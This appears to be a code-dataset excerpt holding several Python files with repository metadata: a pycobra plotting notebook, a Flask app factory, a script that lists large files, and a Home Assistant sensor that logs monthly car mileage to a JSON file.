0.604501
""" COBRA Visualisations -------------------- This notebook will cover the visulaisation and plotting offered by pycobra. """ # %matplotlib inline import numpy as np from pycobra.cobra import Cobra from pycobra.ewa import Ewa from pycobra.visualisation import Visualisation from pycobra.diagnostics import Diagnostics # setting up our random data-set rng = np.random.RandomState(42) # D1 = train machines; D2 = create COBRA; D3 = calibrate epsilon, alpha; D4 = testing n_features = 2 D1, D2, D3, D4 = 200, 200, 200, 200 D = D1 + D2 + D3 + D4 X = rng.uniform(-1, 1, D * n_features).reshape(D, n_features) # Y = np.power(X[:,1], 2) + np.power(X[:,3], 3) + np.exp(X[:,10]) Y = np.power(X[:,0], 2) + np.power(X[:,1], 3) # training data-set X_train = X[:D1 + D2] X_test = X[D1 + D2 + D3:D1 + D2 + D3 + D4] X_eps = X[D1 + D2:D1 + D2 + D3] # for testing Y_train = Y[:D1 + D2] Y_test = Y[D1 + D2 + D3:D1 + D2 + D3 + D4] Y_eps = Y[D1 + D2:D1 + D2 + D3] # set up our COBRA machine with the data cobra = Cobra(epsilon=0.5) cobra.fit(X_train, Y_train) ###################################################################### # Plotting COBRA # ~~~~~~~~~~~~~~ # # We use the visualisation class to plot our results, and for various # visualisations. # cobra_vis = Visualisation(cobra, X_test, Y_test) # to plot our machines, we need a linspace as input. This is the 'scale' to plot and should be the range of the results # since our data ranges from -1 to 1 it is such - and we space it out to a hundred points cobra_vis.plot_machines(machines=["COBRA"]) cobra_vis.plot_machines() ###################################################################### # Plots and Visualisations of Results # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # QQ and Boxplots! # cobra_vis.QQ() cobra_vis.boxplot() ###################################################################### # Plotting EWA! # ~~~~~~~~~~~~~ # # We can use the same visualisation class for seeing how EWA works. Let's # demonstrate this! # ewa = Ewa() ewa.set_beta(X_beta=X_eps, y_beta=Y_eps) ewa.fit(X_train, Y_train) ewa_vis = Visualisation(ewa, X_test, Y_test) ewa_vis.QQ("EWA") ewa_vis.boxplot() ###################################################################### # Plotting ClassifierCobra # ~~~~~~~~~~~~~~~~~~~~~~~~ # from sklearn import datasets from sklearn.metrics import accuracy_score from pycobra.classifiercobra import ClassifierCobra bc = datasets.load_breast_cancer() X_cc = bc.data[:-40] y_cc = bc.target[:-40] X_cc_test = bc.data[-40:] y_cc_test = bc.target[-40:] cc = ClassifierCobra() cc.fit(X_cc, y_cc) cc_vis = Visualisation(cc, X_cc_test, y_cc_test) cc_vis.boxplot() ###################################################################### # Remember that all the estimators in the Pycobra package are scikit-learn # compatible - we can also use the scikit-learn metrics and tools to # analyse our machines! # from sklearn.metrics import classification_report print(classification_report(y_cc_test, cc.predict(X_cc_test))) ###################################################################### # Plotting COBRA colors! # ~~~~~~~~~~~~~~~~~~~~~~ # # We're now going to experiment with plotting colors and data. After we # get information about which indices are used by which machines the best # for a fixed epsilon (or not, we can toggle this option), we can plot the # distribution of machines. # # Why is this useful? Since we're dealing with a 2-D space now, we're # attempting to see if there are some parts in the input space which are # picked up by certain machines. 
This could lead to interesting # experiments and # # We first present a plot where the machine colors are mixed depending on # which machines were selected; after which we plot one machine at a time. # indices, MSE = cobra_vis.indice_info(X_test=X_eps[0:50], y_test=Y_eps[0:50], epsilon=0.50) cobra_vis.color_cobra(X_test=X_eps[0:50], indice_info=indices, single=True) cobra_vis.color_cobra(X_test=X_eps[0:50], indice_info=indices) ###################################################################### # Voronoi Tesselation # ~~~~~~~~~~~~~~~~~~~ # # We present a variety of Voronoi Tesselation based plots - the purpose of # this is to help in visualising the pattern of points which tend to be # picked up. # cobra_vis.voronoi(X_test=X_eps[0:50], indice_info=indices, single=True) cobra_vis.voronoi(X_test=X_eps[0:50], indice_info=indices) ###################################################################### # Gradient-Colored Based Voronoi # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # cobra_vis.voronoi(X_test=X_eps[0:50], indice_info=indices, MSE=MSE, gradient=True) ###################################################################### # Licensed under the MIT License - https://opensource.org/licenses/MIT #
0
0
0
5eae38782b76e9b037188eec504064586659d814
384
py
Python
app/__init__.py
xujl930/crawl_metro
99c52f183fbf52a43847d98c2d0e666197a73287
[ "MIT" ]
null
null
null
app/__init__.py
xujl930/crawl_metro
99c52f183fbf52a43847d98c2d0e666197a73287
[ "MIT" ]
null
null
null
app/__init__.py
xujl930/crawl_metro
99c52f183fbf52a43847d98c2d0e666197a73287
[ "MIT" ]
null
null
null
# -*- coding:utf8 -*- from flask import Flask from flask_mongoengine import MongoEngine from config import config db = MongoEngine()
21.333333
60
0.739583
# -*- coding:utf8 -*- from flask import Flask from flask_mongoengine import MongoEngine from config import config db = MongoEngine() def create_app(config_name): app = Flask(__name__) app.config.from_object(config[config_name]) db.init_app(app) from .api_0_1 import api as api_blueprint app.register_blueprint(api_blueprint, url_prefix='/api') return app
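create_app above is a standard Flask application factory. A minimal usage sketch; it assumes the package is importable as `app` (matching the record path app/__init__.py) and that 'default' is one of the keys in this project's config dict, both of which are assumptions:

from app import create_app  # assumes the package layout given by the record path

application = create_app('default')  # 'default' is an assumed config key

if __name__ == '__main__':
    application.run(debug=True)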
227
0
23
e0f740a7c9719c8085d1dc80c3e3e99aaf3c64b3
2,120
py
Python
practice projects/chap 09/delete unneeded files chap 9/delete unneeded files.py
alperpaksoy/automatetheboringstuff
6bdb7297c25e2c6588accaea00abcac6872f6df2
[ "MIT" ]
null
null
null
practice projects/chap 09/delete unneeded files chap 9/delete unneeded files.py
alperpaksoy/automatetheboringstuff
6bdb7297c25e2c6588accaea00abcac6872f6df2
[ "MIT" ]
null
null
null
practice projects/chap 09/delete unneeded files chap 9/delete unneeded files.py
alperpaksoy/automatetheboringstuff
6bdb7297c25e2c6588accaea00abcac6872f6df2
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # This program finds files that are above a specified size within # a specified folder and its subfolders ''' Write a program that walks through a folder tree and searches for exceptionally large files or folders—say, ones that have a file size of more than 100MB. (Remember, to get a file’s size, you can use os.path.getsize() from the os module.) Print these files with their absolute path to the screen. ''' import os import shutil import sys # converts byte to megabytes # Confirm existence of the specified folder sourceFolder = './source' sourceFolder = os.path.abspath(sourceFolder) # simpleSourceFolder = re.search(r'/([\w .-]+)$',sourceFolder).group(1) tSize = 0.5 * 1024 * 1024 # 0.5 MB if os.path.exists(sourceFolder): print('\nWill scan for files with more than {0:.2} MB in size in'.\ format(mb(tSize))) print(sourceFolder) else: print('Source folder %s does not exist.' % (sourceFolder)) sys.exit() count = 0 # number of files scanned countAbove = 0 # number of files found above the threshold size = 0 # number of files sizeAbove = 0 # total size of files found in MB # Walk through the specified folder # while finding the locations of files above a certain size # and printing out their paths. for foldername, subfolders, filenames in os.walk(sourceFolder): print('\nExamining "{0}" for large files...'.\ format(os.path.basename(foldername))) for filename in filenames: count += 1 fileSize = os.path.getsize(os.path.join(foldername, filename)) size += fileSize if fileSize >= tSize: print('Found: "{0}", {1:.2} MB'.format(filename,\ mb(fileSize))) countAbove += 1 sizeAbove += fileSize print('\nReviewed {0} files with'\ ' a total size of {1:,} MB.'.format(count,\ int(mb(size)))) print('Found {0} of them to be above {1:.2} MB '\ 'with a total size of {2} MB.'.\ format(countAbove, tSize / (1024 * 1024), int(mb(sizeAbove))))
32.615385
71
0.651887
#!/usr/bin/env python3 # This program finds files that are above a specified size within # a specified folder and its subfolders ''' Write a program that walks through a folder tree and searches for exceptionally large files or folders—say, ones that have a file size of more than 100MB. (Remember, to get a file’s size, you can use os.path.getsize() from the os module.) Print these files with their absolute path to the screen. ''' import os import shutil import sys # converts byte to megabytes def mb (size): return size / (1024 * 1024) # Confirm existence of the specified folder sourceFolder = './source' sourceFolder = os.path.abspath(sourceFolder) # simpleSourceFolder = re.search(r'/([\w .-]+)$',sourceFolder).group(1) tSize = 0.5 * 1024 * 1024 # 0.5 MB if os.path.exists(sourceFolder): print('\nWill scan for files with more than {0:.2} MB in size in'.\ format(mb(tSize))) print(sourceFolder) else: print('Source folder %s does not exist.' % (sourceFolder)) sys.exit() count = 0 # number of files scanned countAbove = 0 # number of files found above the threshold size = 0 # number of files sizeAbove = 0 # total size of files found in MB # Walk through the specified folder # while finding the locations of files above a certain size # and printing out their paths. for foldername, subfolders, filenames in os.walk(sourceFolder): print('\nExamining "{0}" for large files...'.\ format(os.path.basename(foldername))) for filename in filenames: count += 1 fileSize = os.path.getsize(os.path.join(foldername, filename)) size += fileSize if fileSize >= tSize: print('Found: "{0}", {1:.2} MB'.format(filename,\ mb(fileSize))) countAbove += 1 sizeAbove += fileSize print('\nReviewed {0} files with'\ ' a total size of {1:,} MB.'.format(count,\ int(mb(size)))) print('Found {0} of them to be above {1:.2} MB '\ 'with a total size of {2} MB.'.\ format(countAbove, tSize / (1024 * 1024), int(mb(sizeAbove))))
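The exercise text at the top of this record asks for a walk of a folder tree that prints the absolute path of every file larger than 100 MB. A compact stand-alone sketch of that core idea; the threshold and starting folder are illustrative:

import os

def report_large_files(root='.', threshold=100 * 1024 * 1024):
    # Walk the tree and print the absolute path and size of each large file.
    for folder, _, files in os.walk(root):
        for name in files:
            path = os.path.abspath(os.path.join(folder, name))
            size = os.path.getsize(path)
            if size >= threshold:
                print(path, size // (1024 * 1024), 'MB')

report_large_files()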
25
0
22
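The script in the row above is, at its core, a single os.walk() pass that compares os.path.getsize() against a byte threshold. The sketch below restates that pattern in a self-contained, reusable form; it is illustrative only, and the names find_large_files, bytes_to_mb and the './source' / 0.5 MB defaults are assumptions chosen to mirror the sample, not identifiers taken from the repository row itself.

#!/usr/bin/env python3
# Illustrative sketch (assumed names): walk a folder tree and report files
# at or above a size threshold, mirroring the pattern used in the row above.
import os


def bytes_to_mb(size):
    """Convert a byte count to megabytes."""
    return size / (1024 * 1024)


def find_large_files(root, threshold_bytes):
    """Yield (absolute path, size in bytes) for every file >= threshold_bytes."""
    for foldername, _subfolders, filenames in os.walk(root):
        for filename in filenames:
            path = os.path.join(foldername, filename)
            size = os.path.getsize(path)
            if size >= threshold_bytes:
                yield os.path.abspath(path), size


if __name__ == '__main__':
    # The 0.5 MB threshold and './source' root are assumed defaults matching the sample.
    for path, size in find_large_files('./source', 0.5 * 1024 * 1024):
        print('Found: "{0}", {1:.2f} MB'.format(path, bytes_to_mb(size)))

Keeping the walk in a generator and the reporting in the caller separates the traversal logic from the output formatting, which is the main readability gain over the inline version above.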
abbcc95a49709a058b3c9645b94868fe5c4bb1f5
7,973
py
Python
custom_components/sensor/car_milage_per_month.py
mar-schmidt/home-assistant-sensor-car-milage
b329b0e1fb26f211d909c747624b502f51017de7
[ "MIT" ]
null
null
null
custom_components/sensor/car_milage_per_month.py
mar-schmidt/home-assistant-sensor-car-milage
b329b0e1fb26f211d909c747624b502f51017de7
[ "MIT" ]
null
null
null
custom_components/sensor/car_milage_per_month.py
mar-schmidt/home-assistant-sensor-car-milage
b329b0e1fb26f211d909c747624b502f51017de7
[ "MIT" ]
null
null
null
""" Configuration: To use the car_milage_per_month component you will need to add the following to your configuration.yaml file: car_milage_per_month: odometer_sensor: sensor.ete123_odometer (the sensor that holds the total amount of km) """ import json import logging import calendar import os import voluptuous as vol import homeassistant.helpers.config_validation as cv from datetime import datetime from homeassistant.const import ( CONF_NAME, CONF_UNIT_OF_MEASUREMENT, LENGTH_KILOMETERS, STATE_UNKNOWN ) from homeassistant.helpers.entity import Entity from homeassistant.components.sensor import PLATFORM_SCHEMA from homeassistant.core import HomeAssistant, CoreState _LOGGER = logging.getLogger(__name__) DEFAULT_NAME = 'car_milage_per_month' DOMAIN = 'car_milage_per_month' CONF_ODOMETER_SENSOR = 'odometer_sensor' PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({ vol.Required(CONF_ODOMETER_SENSOR): cv.entity_id, vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string, vol.Optional(CONF_UNIT_OF_MEASUREMENT): cv.string }) def setup_platform(hass, config, add_devices, discovery_info=None): """Setup the sensor platform.""" odometer_entity = config.get(CONF_ODOMETER_SENSOR) name = config.get(CONF_NAME) unit = config.get(CONF_UNIT_OF_MEASUREMENT) data = CarMilageData(hass, odometer_entity) add_devices([CarMilageSensor(hass, odometer_entity, name, unit, data)]) class CarMilageSensor(Entity): """Representation of a Sensor.""" def __init__(self, hass, odometer_entity, name, unit_of_measurement, data): """Initialize the sensor.""" self._hass = hass self._odometer_entity = odometer_entity self._name = name self._unit_of_measurement = unit_of_measurement self._state = STATE_UNKNOWN self.data = data self.update() @property def name(self): """Return the name of the sensor.""" return self._name @property def state(self): """Return the state of the sensor.""" return self.data.getMilageForCurrentMonth() @property def unit_of_measurement(self): """Return the unit of measurement.""" return self._unit_of_measurement @property def device_state_attributes(self): """Return device specific state attributes.""" return self.data.values def update(self): """Fetch new state data for the sensor. This is the only method that should fetch new data for Home Assistant. """ if self._hass.state not in (CoreState.starting, CoreState.not_running): self.data.update() value = self.data.values class CarMilageData(object): """docstring for CarMilageData""" def getMilageForCurrentMonth(self): """ Returns the current month milage value """ current_month = str(datetime.now().month).lstrip("0") return self.getMilageForMonth(current_month) def setMilageForCurrentMonth(self, odometer_value): """ Sets the passed value to the current month milage value in the self.milageFile file """ current_month = str(datetime.now().month).lstrip("0") current_month_name = calendar.month_name[int(current_month)] _LOGGER.debug("Updating milage for month: %s to: %s", current_month_name, odometer_value) self.values['current_month'] = odometer_value with open(self.milageFile, 'r') as milage: data = json.load(milage) data[current_month_name] = odometer_value os.remove(self.milageFile) with open(self.milageFile, 'w') as milage: json.dump(data, milage) def getMilageForMonth(self, month): """ This method will return corresponding milage odometer value for the passed month by reading it from the self.milageFile file. 
""" monthName = calendar.month_name[int(month)] with open(self.milageFile) as milage: data = json.load(milage) for key, value in data.items(): if str(key) == str(monthName): return value def getStateValueFromEntity(self, entity): """ Get the current state from the passed entity """ state = self.hass.states.get(entity) return int(state.state) def setLastKnownValue(self, odometer_value): """ Sets the passed value to the last_known_value in the self.milageFile file and in the list """ _LOGGER.debug("Updating last_known_value to: %s", odometer_value) self.values['last_known_value'] = odometer_value with open(self.milageFile, 'r') as milage: data = json.load(milage) data['last_known_value'] = odometer_value os.remove(self.milageFile) with open(self.milageFile, 'w') as milage: json.dump(data, milage)
35.435556
135
0.658723
""" Configuration: To use the car_milage_per_month component you will need to add the following to your configuration.yaml file: car_milage_per_month: odometer_sensor: sensor.ete123_odometer (the sensor that holds the total amount of km) """ import json import logging import calendar import os import voluptuous as vol import homeassistant.helpers.config_validation as cv from datetime import datetime from homeassistant.const import ( CONF_NAME, CONF_UNIT_OF_MEASUREMENT, LENGTH_KILOMETERS, STATE_UNKNOWN ) from homeassistant.helpers.entity import Entity from homeassistant.components.sensor import PLATFORM_SCHEMA from homeassistant.core import HomeAssistant, CoreState _LOGGER = logging.getLogger(__name__) DEFAULT_NAME = 'car_milage_per_month' DOMAIN = 'car_milage_per_month' CONF_ODOMETER_SENSOR = 'odometer_sensor' PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({ vol.Required(CONF_ODOMETER_SENSOR): cv.entity_id, vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string, vol.Optional(CONF_UNIT_OF_MEASUREMENT): cv.string }) def setup_platform(hass, config, add_devices, discovery_info=None): """Setup the sensor platform.""" odometer_entity = config.get(CONF_ODOMETER_SENSOR) name = config.get(CONF_NAME) unit = config.get(CONF_UNIT_OF_MEASUREMENT) data = CarMilageData(hass, odometer_entity) add_devices([CarMilageSensor(hass, odometer_entity, name, unit, data)]) class CarMilageSensor(Entity): """Representation of a Sensor.""" def __init__(self, hass, odometer_entity, name, unit_of_measurement, data): """Initialize the sensor.""" self._hass = hass self._odometer_entity = odometer_entity self._name = name self._unit_of_measurement = unit_of_measurement self._state = STATE_UNKNOWN self.data = data self.update() @property def name(self): """Return the name of the sensor.""" return self._name @property def state(self): """Return the state of the sensor.""" return self.data.getMilageForCurrentMonth() @property def unit_of_measurement(self): """Return the unit of measurement.""" return self._unit_of_measurement @property def device_state_attributes(self): """Return device specific state attributes.""" return self.data.values def update(self): """Fetch new state data for the sensor. This is the only method that should fetch new data for Home Assistant. """ if self._hass.state not in (CoreState.starting, CoreState.not_running): self.data.update() value = self.data.values class CarMilageData(object): """docstring for CarMilageData""" def __init__(self, hass, odometer_entity): self.values = { 'last_known_value': 0, 'current_month': 0, calendar.month_name[1]: 0, calendar.month_name[2]: 0, calendar.month_name[3]: 0, calendar.month_name[4]: 0, calendar.month_name[5]: 0, calendar.month_name[6]: 0, calendar.month_name[7]: 0, calendar.month_name[8]: 0, calendar.month_name[9]: 0, calendar.month_name[10]: 0, calendar.month_name[11]: 0, calendar.month_name[12]: 0 } self.hass = hass self.odometer_entity = odometer_entity self.milageFile = self.hass.config.path('milage.json') _LOGGER.info("Milage file: %s", self.milageFile) # Create the file if not exist if not os.path.exists(self.milageFile): with open(self.milageFile, 'w') as milage: json.dump(self.values, milage) def update(self): odometer_value = self.getStateValueFromEntity(self.odometer_entity) # If last_known_value is zero, it means that this is the first time running this component, # or the self.milageFile has been removed. Handle this by setting the current last_known_value # to the same value as the odometer_value. 
Which means that we will start calculating the diff # at the next odometer change if self.values['last_known_value'] == 0: self.setLastKnownValue(odometer_value) # This will ensure we set the new value for current month. if self.getLastKnownValue() < odometer_value: # Get the diff, the milage to add to our month diff = abs(odometer_value - self.values['last_known_value']) _LOGGER.debug( "New odometer value detected. Updating current months milage count. Before: %s After: %s", self.getMilageForCurrentMonth(), self.getMilageForCurrentMonth() + diff ) new_value = self.getMilageForCurrentMonth() + diff self.setMilageForCurrentMonth(new_value) # Set the last known value, after we have updated the current month milage value self.setLastKnownValue(odometer_value) # We interate over all months and set corresponding values, this is not really needed during normal operations, # since the self.values already contains recent values. # But we'll loose them after restart of hass, so we might as well set them every time from file. for i in range(1, 12): _LOGGER.debug("Updating attribute %s with value %s from file", calendar.month_name[i], self.values[calendar.month_name[i]]) self.values[calendar.month_name[i]] = self.getMilageForMonth(i) _LOGGER.debug("%s", self.values) def getMilageForCurrentMonth(self): """ Returns the current month milage value """ current_month = str(datetime.now().month).lstrip("0") return self.getMilageForMonth(current_month) def setMilageForCurrentMonth(self, odometer_value): """ Sets the passed value to the current month milage value in the self.milageFile file """ current_month = str(datetime.now().month).lstrip("0") current_month_name = calendar.month_name[int(current_month)] _LOGGER.debug("Updating milage for month: %s to: %s", current_month_name, odometer_value) self.values['current_month'] = odometer_value with open(self.milageFile, 'r') as milage: data = json.load(milage) data[current_month_name] = odometer_value os.remove(self.milageFile) with open(self.milageFile, 'w') as milage: json.dump(data, milage) def getMilageForMonth(self, month): """ This method will return corresponding milage odometer value for the passed month by reading it from the self.milageFile file. """ monthName = calendar.month_name[int(month)] with open(self.milageFile) as milage: data = json.load(milage) for key, value in data.items(): if str(key) == str(monthName): return value def getStateValueFromEntity(self, entity): """ Get the current state from the passed entity """ state = self.hass.states.get(entity) return int(state.state) def getLastKnownValue(self): with open(self.milageFile) as milage: data = json.load(milage) return int(data['last_known_value']) def setLastKnownValue(self, odometer_value): """ Sets the passed value to the last_known_value in the self.milageFile file and in the list """ _LOGGER.debug("Updating last_known_value to: %s", odometer_value) self.values['last_known_value'] = odometer_value with open(self.milageFile, 'r') as milage: data = json.load(milage) data['last_known_value'] = odometer_value os.remove(self.milageFile) with open(self.milageFile, 'w') as milage: json.dump(data, milage)
2,922
0
80
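The CarMilageData methods in the row above all share one persistence pattern: load milage.json, change a single key, and write the whole dictionary back. The sketch below isolates that read-modify-write step. It is illustrative only: update_month_value and the literal 'milage.json' path are assumed names; the component itself resolves the file via hass.config.path('milage.json').

# Illustrative sketch (assumed names) of the JSON read-modify-write pattern
# used by the component above.
import json


def update_month_value(milage_path, key, value):
    """Read the mileage JSON file, update one key, and write it back.

    Opening the file in 'w' mode truncates it, so the explicit os.remove()
    call used by the component above is not strictly required for correctness.
    """
    with open(milage_path, 'r') as milage:
        data = json.load(milage)
    data[key] = value
    with open(milage_path, 'w') as milage:
        json.dump(data, milage)


# Example usage (assumed file name and key):
# update_month_value('milage.json', 'January', 1234)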